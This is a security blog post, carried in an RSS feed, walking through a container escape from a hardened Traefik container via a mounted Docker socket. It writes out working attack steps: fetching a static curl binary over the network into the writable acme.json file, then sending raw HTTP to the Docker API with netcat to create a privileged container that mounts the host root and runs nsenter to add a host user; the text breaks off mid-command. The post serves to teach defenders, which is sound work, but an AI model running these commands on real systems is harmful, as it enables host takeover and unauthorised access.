<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: David Gries</title>
    <description>The latest articles on Forem by David Gries (@dgries).</description>
    <link>https://forem.com/dgries</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1202021%2Ff445d49b-4627-4ba6-8f42-5a78d10e665d.jpeg</url>
      <title>Forem: David Gries</title>
      <link>https://forem.com/dgries</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/dgries"/>
    <language>en</language>
    <item>
      <title>Opening Pandora's Container - Gaining Host Access (Part 2)</title>
      <dc:creator>David Gries</dc:creator>
      <pubDate>Sat, 28 Sep 2024 16:43:37 +0000</pubDate>
      <link>https://forem.com/dgries/opening-pandoras-container-gaining-host-access-part-2-2i2c</link>
      <guid>https://forem.com/dgries/opening-pandoras-container-gaining-host-access-part-2-2i2c</guid>
      <description>&lt;p&gt;In my &lt;a href="https://dev.to/dgries/opening-pandoras-container-how-exposing-the-docker-socket-paves-the-way-to-host-control-part-1-1nm4"&gt;previous post&lt;/a&gt;, I gave you a quick rundown on the Docker socket and its purpose. But have you ever wondered how an attacker could exploit this to seize control of your host system? In this post, we’ll explore the potential risks associated with a mounted Docker socket and how these vulnerabilities can be exploited.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;code&gt;~ $ ./unveiling_the_threat&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;I’ve chosen Traefik as our example, and for good reason - it’s often exposed to the public internet, making it a tempting target. In the world of software, vulnerabilities are everywhere, just waiting to be found. An attacker only needs one way in to run code inside the Traefik container.&lt;/p&gt;

&lt;p&gt;While Traefik is generally recognized for its robust security features, it’s important to remember that no system is immune. Just last week, we saw the release of &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45410" rel="noopener noreferrer"&gt;CVE-2024-45410&lt;/a&gt;, which highlighted a critical security flaw. This example serves as a stark reminder: any publicly accessible endpoint can harbor hidden dangers, and vigilance is key to securing your systems.&lt;/p&gt;

&lt;p&gt;But let's get to the interesting part!&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;code&gt;~ $ ./status_quo&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;In last week’s post, I outlined a basic setup based on Traefik's documentation. However, in a real-world scenario, administrators typically implement various hardening measures. Let’s begin with a more realistic and secure configuration for Traefik, as defined in the following Docker Compose file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;traefik&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;traefik:v3.1.4@sha256:6215528042906b25f23fcf51cc5bdda29e078c6e84c237d4f59c00370cb68440&lt;/span&gt;
    &lt;span class="na"&gt;container_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;traefik&lt;/span&gt;
    &lt;span class="na"&gt;hostname&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;traefik&lt;/span&gt;
    &lt;span class="na"&gt;restart&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;unless-stopped&lt;/span&gt;
    &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;10000:10000&lt;/span&gt;
    &lt;span class="na"&gt;group_add&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;997'&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;proxy&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
        &lt;span class="na"&gt;published&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
        &lt;span class="na"&gt;protocol&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tcp&lt;/span&gt;
        &lt;span class="na"&gt;mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;host&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;443&lt;/span&gt;
        &lt;span class="na"&gt;published&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;443&lt;/span&gt;
        &lt;span class="na"&gt;protocol&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tcp&lt;/span&gt;
        &lt;span class="na"&gt;mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;host&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;443&lt;/span&gt;
        &lt;span class="na"&gt;published&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;443&lt;/span&gt;
        &lt;span class="na"&gt;protocol&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;udp&lt;/span&gt;
        &lt;span class="na"&gt;mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;host&lt;/span&gt;
    &lt;span class="na"&gt;security_opt&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;no-new-privileges:true&lt;/span&gt;
    &lt;span class="na"&gt;cap_drop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;ALL&lt;/span&gt;
    &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bind&lt;/span&gt;
        &lt;span class="na"&gt;source&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./configs/traefik.yaml&lt;/span&gt;
        &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/etc/traefik/traefik.yaml&lt;/span&gt;
        &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bind&lt;/span&gt;
        &lt;span class="na"&gt;source&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./configs/config.yaml&lt;/span&gt;
        &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/etc/traefik/config.yaml&lt;/span&gt;
        &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bind&lt;/span&gt;
        &lt;span class="na"&gt;source&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/docker.sock&lt;/span&gt;
        &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/docker.sock&lt;/span&gt;
        &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bind&lt;/span&gt;
        &lt;span class="na"&gt;source&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./acme.json&lt;/span&gt;
        &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/etc/traefik/acme.json&lt;/span&gt;

&lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;proxy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;proxy&lt;/span&gt;
    &lt;span class="na"&gt;external&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As you can see, this setup does not run as root; instead, it operates as a user with limited permissions. The Docker group with ID &lt;code&gt;997&lt;/code&gt; is added to allow Traefik to communicate with the socket:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;david@debian:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-ln&lt;/span&gt; /var/run/docker.sock 
srw-rw---- 1 0 997 0 Sep 28 08:46 /var/run/docker.sock
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The container uses a read-only root filesystem, and wherever feasible, files are mounted as read-only, including the Docker socket itself. The latest Traefik image and Docker version are utilized, all capabilities are dropped, and basic &lt;code&gt;security_opt&lt;/code&gt; options are configured. So, on the surface, this setup appears quite secure, right?&lt;/p&gt;

&lt;p&gt;Let’s take a deeper look inside the container!&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;code&gt;~ # ./compromised&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;Once inside the Traefik container, we can gather some basic system information and check which tools are available:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /etc/os-release 
&lt;span class="nv"&gt;NAME&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"Alpine Linux"&lt;/span&gt;
&lt;span class="nv"&gt;ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;alpine
&lt;span class="nv"&gt;VERSION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;3.20.3
&lt;span class="nv"&gt;PRETTY_NAME&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"Alpine Linux v3.20"&lt;/span&gt;
&lt;span class="nv"&gt;HOME_URL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"https://alpinelinux.org/"&lt;/span&gt;
&lt;span class="nv"&gt;BUG_REPORT_URL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"https://gitlab.alpinelinux.org/alpine/aports/-/issues"&lt;/span&gt;
~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; /usr/bin/
&lt;span class="o"&gt;[&lt;/span&gt;            chvt         &lt;span class="nb"&gt;dirname      &lt;/span&gt;free         ipcrm        &lt;span class="nb"&gt;md5sum       od           realpath     &lt;/span&gt;showkey      &lt;span class="nb"&gt;time         uniq         &lt;/span&gt;vlock
&lt;span class="o"&gt;[[&lt;/span&gt;           &lt;span class="nb"&gt;cksum        &lt;/span&gt;dos2unix     fuser        ipcs         mesg         openvt       renice       &lt;span class="nb"&gt;shred        timeout      &lt;/span&gt;unix2dos     volname
&lt;span class="nb"&gt;awk          &lt;/span&gt;clear        &lt;span class="nb"&gt;du           &lt;/span&gt;getconf      killall      microcom     passwd       reset        &lt;span class="nb"&gt;shuf         &lt;/span&gt;top          &lt;span class="nb"&gt;unlink       wc
basename     &lt;/span&gt;cmp          eject        getent       last         &lt;span class="nb"&gt;mkfifo       paste        &lt;/span&gt;resize       &lt;span class="nb"&gt;sort         tr           &lt;/span&gt;unlzma       wget
bc           &lt;span class="nb"&gt;comm         env          groups       &lt;/span&gt;ldd          mkpasswd     pgrep        scanelf      &lt;span class="nb"&gt;split        &lt;/span&gt;traceroute   unlzop       which
beep         cpio         &lt;span class="nb"&gt;expand       &lt;/span&gt;hd           less         nc           pkill        &lt;span class="nb"&gt;seq          &lt;/span&gt;ssl_client   traceroute6  unshare      &lt;span class="nb"&gt;who
&lt;/span&gt;blkdiscard   crontab      &lt;span class="nb"&gt;expr         head         &lt;/span&gt;logger       &lt;span class="nb"&gt;nl           &lt;/span&gt;pmap         setkeycodes  strings      tree         unxz         &lt;span class="nb"&gt;whoami
&lt;/span&gt;bunzip2      cryptpw      &lt;span class="nb"&gt;factor       &lt;/span&gt;hexdump      lsof         nmeter       &lt;span class="nb"&gt;printf       &lt;/span&gt;setsid       &lt;span class="nb"&gt;sum          truncate     &lt;/span&gt;unzip        whois
bzcat        &lt;span class="nb"&gt;cut          &lt;/span&gt;fallocate    &lt;span class="nb"&gt;hostid       &lt;/span&gt;lsusb        &lt;span class="nb"&gt;nohup        &lt;/span&gt;pscan        &lt;span class="nb"&gt;sha1sum      tac          tty          uptime       &lt;/span&gt;xargs
bzip2        dc           find         iconv        lzcat        &lt;span class="nb"&gt;nproc        &lt;/span&gt;pstree       &lt;span class="nb"&gt;sha256sum    tail         &lt;/span&gt;ttysize      uudecode     xxd
c_rehash     deallocvt    flock        &lt;span class="nb"&gt;id           &lt;/span&gt;lzma         nsenter      pwdx         sha3sum      &lt;span class="nb"&gt;tee          &lt;/span&gt;udhcpc6      uuencode     xzcat
cal          diff         &lt;span class="nb"&gt;fold         install      &lt;/span&gt;lzopcat      nslookup     &lt;span class="nb"&gt;readlink     sha512sum    test         unexpand     &lt;/span&gt;vi           &lt;span class="nb"&gt;yes&lt;/span&gt;
~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-ln&lt;/span&gt; /var/run/docker.sock 
srw-rw----    1 0        997              0 Sep 28 13:46 /var/run/docker.sock
~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;whoami
whoami&lt;/span&gt;: unknown uid 10000
~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;groups
&lt;/span&gt;10000groups: unknown ID 10000
 997groups: unknown ID 997
~ &lt;span class="nv"&gt;$ &lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As observed, we have a minimal Alpine image, which limits our immediate options. However, we do have access to the Docker socket as a member of group &lt;code&gt;997&lt;/code&gt;, which has read-write permissions on the socket file! Do you remember the &lt;code&gt;read_only&lt;/code&gt; mount option? It only prevents filesystem changes such as deleting the socket file; it does not stop us from connecting to the socket and sending requests through it.&lt;/p&gt;

&lt;p&gt;But how do we establish communication with the Docker API? One way is to bring additional tools onto the system. Our utilities are limited, and while &lt;code&gt;wget&lt;/code&gt; is available, it is BusyBox's version, which unfortunately doesn’t seem to support communication with local socket files. It can still be used to download something that does, though.&lt;/p&gt;

&lt;p&gt;To complicate matters, the root filesystem is mounted read-only, leaving us without a suitable target for downloading files, not even a temporary location like &lt;code&gt;/tmp&lt;/code&gt;. However, there's a silver lining: Traefik requires access to the &lt;code&gt;acme.json&lt;/code&gt; file for storing certificate information, and this file is writable! By overwriting it, we can inject a &lt;code&gt;curl&lt;/code&gt; binary into the container, enabling us to communicate with the Docker API:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~ &lt;span class="nv"&gt;$ &lt;/span&gt;wget https://github.com/moparisthebest/static-curl/releases/download/v8.7.1/curl-amd64 &lt;span class="nt"&gt;-O&lt;/span&gt; /etc/traefik/acme.json
Connecting to github.com &lt;span class="o"&gt;(&lt;/span&gt;140.82.121.4:443&lt;span class="o"&gt;)&lt;/span&gt;
Connecting to objects.githubusercontent.com &lt;span class="o"&gt;(&lt;/span&gt;185.199.110.133:443&lt;span class="o"&gt;)&lt;/span&gt;
saving to &lt;span class="s1"&gt;'/etc/traefik/acme.json'&lt;/span&gt;
acme.json            100% |&lt;span class="k"&gt;**********************************************************************************************************************&lt;/span&gt;| 5310k  0:00:00 ETA
&lt;span class="s1"&gt;'/etc/traefik/acme.json'&lt;/span&gt; saved
~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;chmod&lt;/span&gt; +x /etc/traefik/acme.json
~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;alias &lt;/span&gt;&lt;span class="nv"&gt;curl&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'/etc/traefik/acme.json'&lt;/span&gt;
~ &lt;span class="nv"&gt;$ &lt;/span&gt;curl &lt;span class="nt"&gt;--silent&lt;/span&gt; &lt;span class="nt"&gt;--unix-socket&lt;/span&gt; /var/run/docker.sock &lt;span class="s2"&gt;"http://localhost/version"&lt;/span&gt;
&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Platform"&lt;/span&gt;:&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Name"&lt;/span&gt;:&lt;span class="s2"&gt;"Docker Engine - Community"&lt;/span&gt;&lt;span class="o"&gt;}&lt;/span&gt;,&lt;span class="s2"&gt;"Components"&lt;/span&gt;:[&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Name"&lt;/span&gt;:&lt;span class="s2"&gt;"Engine"&lt;/span&gt;,&lt;span class="s2"&gt;"Version"&lt;/span&gt;:&lt;span class="s2"&gt;"27.3.1"&lt;/span&gt;,&lt;span class="s2"&gt;"Details"&lt;/span&gt;:&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"ApiVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"1.47"&lt;/span&gt;,&lt;span class="s2"&gt;"Arch"&lt;/span&gt;:&lt;span class="s2"&gt;"amd64"&lt;/span&gt;,&lt;span class="s2"&gt;"BuildTime"&lt;/span&gt;:&lt;span class="s2"&gt;"2024-09-20T11:41:11.000000000+00:00"&lt;/span&gt;,&lt;span class="s2"&gt;"Experimental"&lt;/span&gt;:&lt;span class="s2"&gt;"false"&lt;/span&gt;,&lt;span class="s2"&gt;"GitCommit"&lt;/span&gt;:&lt;span class="s2"&gt;"41ca978"&lt;/span&gt;,&lt;span class="s2"&gt;"GoVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"go1.22.7"&lt;/span&gt;,&lt;span class="s2"&gt;"KernelVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"6.1.0-25-amd64"&lt;/span&gt;,&lt;span class="s2"&gt;"MinAPIVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"1.24"&lt;/span&gt;,&lt;span class="s2"&gt;"Os"&lt;/span&gt;:&lt;span class="s2"&gt;"linux"&lt;/span&gt;&lt;span class="o"&gt;}}&lt;/span&gt;,&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Name"&lt;/span&gt;:&lt;span class="s2"&gt;"containerd"&lt;/span&gt;,&lt;span class="s2"&gt;"Version"&lt;/span&gt;:&lt;span class="s2"&gt;"1.7.22"&lt;/span&gt;,&lt;span class="s2"&gt;"Details"&lt;/span&gt;:&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"GitCommit"&lt;/span&gt;:&lt;span class="s2"&gt;"7f7fdf5fed64eb6a7caf99b3e12efcf9d60e311c"&lt;/span&gt;&lt;span class="o"&gt;}}&lt;/span&gt;,&lt;span 
class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Name"&lt;/span&gt;:&lt;span class="s2"&gt;"runc"&lt;/span&gt;,&lt;span class="s2"&gt;"Version"&lt;/span&gt;:&lt;span class="s2"&gt;"1.1.14"&lt;/span&gt;,&lt;span class="s2"&gt;"Details"&lt;/span&gt;:&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"GitCommit"&lt;/span&gt;:&lt;span class="s2"&gt;"v1.1.14-0-g2c9f560"&lt;/span&gt;&lt;span class="o"&gt;}}&lt;/span&gt;,&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Name"&lt;/span&gt;:&lt;span class="s2"&gt;"docker-init"&lt;/span&gt;,&lt;span class="s2"&gt;"Version"&lt;/span&gt;:&lt;span class="s2"&gt;"0.19.0"&lt;/span&gt;,&lt;span class="s2"&gt;"Details"&lt;/span&gt;:&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"GitCommit"&lt;/span&gt;:&lt;span class="s2"&gt;"de40ad0"&lt;/span&gt;&lt;span class="o"&gt;}}]&lt;/span&gt;,&lt;span class="s2"&gt;"Version"&lt;/span&gt;:&lt;span class="s2"&gt;"27.3.1"&lt;/span&gt;,&lt;span class="s2"&gt;"ApiVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"1.47"&lt;/span&gt;,&lt;span class="s2"&gt;"MinAPIVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"1.24"&lt;/span&gt;,&lt;span class="s2"&gt;"GitCommit"&lt;/span&gt;:&lt;span class="s2"&gt;"41ca978"&lt;/span&gt;,&lt;span class="s2"&gt;"GoVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"go1.22.7"&lt;/span&gt;,&lt;span class="s2"&gt;"Os"&lt;/span&gt;:&lt;span class="s2"&gt;"linux"&lt;/span&gt;,&lt;span class="s2"&gt;"Arch"&lt;/span&gt;:&lt;span class="s2"&gt;"amd64"&lt;/span&gt;,&lt;span class="s2"&gt;"KernelVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"6.1.0-25-amd64"&lt;/span&gt;,&lt;span class="s2"&gt;"BuildTime"&lt;/span&gt;:&lt;span class="s2"&gt;"2024-09-20T11:41:11.000000000+00:00"&lt;/span&gt;&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;But this requires the container to reach github.com. So let's assume it can't access the internet at all. Is there still a way? Going back to the available tools, &lt;code&gt;netcat&lt;/code&gt; (&lt;code&gt;nc&lt;/code&gt;) caught my eye. It can read and write data over network connections, which is exactly what we need to communicate with the Docker API:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~ &lt;span class="nv"&gt;$ &lt;/span&gt;nc &lt;span class="nt"&gt;-v&lt;/span&gt;
BusyBox v1.36.1 &lt;span class="o"&gt;(&lt;/span&gt;2024-06-10 07:11:47 UTC&lt;span class="o"&gt;)&lt;/span&gt; multi-call binary.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Although the BusyBox version of &lt;code&gt;netcat&lt;/code&gt; differs slightly from the commonly used OpenBSD version, it remains a viable option for our needs.&lt;/p&gt;
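&lt;p&gt;As a quick check that &lt;code&gt;nc&lt;/code&gt; can reach the API, a harmless read-only request can be sent first. The following is a minimal sketch, not part of the original session: the &lt;code&gt;version_request&lt;/code&gt; helper and the &lt;code&gt;SOCK&lt;/code&gt; variable are names made up for illustration, and the &lt;code&gt;local:&lt;/code&gt; address form is assumed to be supported by the installed BusyBox &lt;code&gt;nc&lt;/code&gt;.&lt;/p&gt;

```shell
#!/bin/sh
# Hypothetical helper (not from the original post): prints a raw HTTP/1.1
# GET request for the Docker Engine API /version endpoint.
version_request() {
  printf 'GET /version HTTP/1.1\r\n'
  printf 'Host: localhost\r\n'
  # Ask the daemon to close the connection after the response.
  printf 'Connection: close\r\n\r\n'
}

# Assumed socket path, taken from the Compose file in this post.
SOCK=/var/run/docker.sock

if [ -S "$SOCK" ]; then
  # "local:" is the BusyBox nc address form for Unix sockets (assumption);
  # sleep keeps stdin open briefly so the response can arrive.
  (version_request; sleep 1) | nc "local:$SOCK"
else
  echo "no socket at $SOCK, printing the request instead:"
  version_request
fi
```

&lt;p&gt;If the socket is reachable, the response should contain the same version information that the &lt;code&gt;curl&lt;/code&gt; call returned, preceded by the HTTP response headers.&lt;/p&gt;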

&lt;h2&gt;
  
  
  &lt;code&gt;full_control:x:1002:1002::/:/bin/sh&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;So, what’s next? Access to the Docker socket effectively grants us full control over the underlying system. To illustrate this, we’ll create a user on the host system using just &lt;code&gt;netcat&lt;/code&gt; from within the Traefik container:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"POST /containers/create HTTP/1.1&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Host: localhost&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Content-Type: application/json&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Content-Length: &lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="s1"&gt;'{
&amp;gt;     \"Image\": \"traefik@sha256:6215528042906b25f23fcf51cc5bdda29e078c6e84c237d4f59c00370cb68440\",
&amp;gt;     \"Cmd\": [\"sh\", \"-c\", \"nsenter --mount=/host/proc/1/ns/mnt -- /usr/sbin/useradd hacked\"],
&amp;gt;     \"HostConfig\": {
&amp;gt;       \"Privileged\": true,
&amp;gt;       \"NetworkMode\": \"host\",
&amp;gt;       \"Binds\": [\"/:/host\", \"/dev:/dev\"]
&amp;gt;     }
&amp;gt; }'&lt;/span&gt; | &lt;span class="nb"&gt;wc&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="se"&gt;\r\n\r\n&lt;/span&gt;&lt;span class="s2"&gt;{
&amp;gt;     &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;Image&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;: &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;traefik@sha256:6215528042906b25f23fcf51cc5bdda29e078c6e84c237d4f59c00370cb68440&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;,
&amp;gt;     &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;Cmd&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;: [&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;sh&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;, &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;-c&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;, &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;nsenter --mount=/host/proc/1/ns/mnt -- /usr/sbin/useradd hacked&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;],
&amp;gt;     &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;HostConfig&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;: {
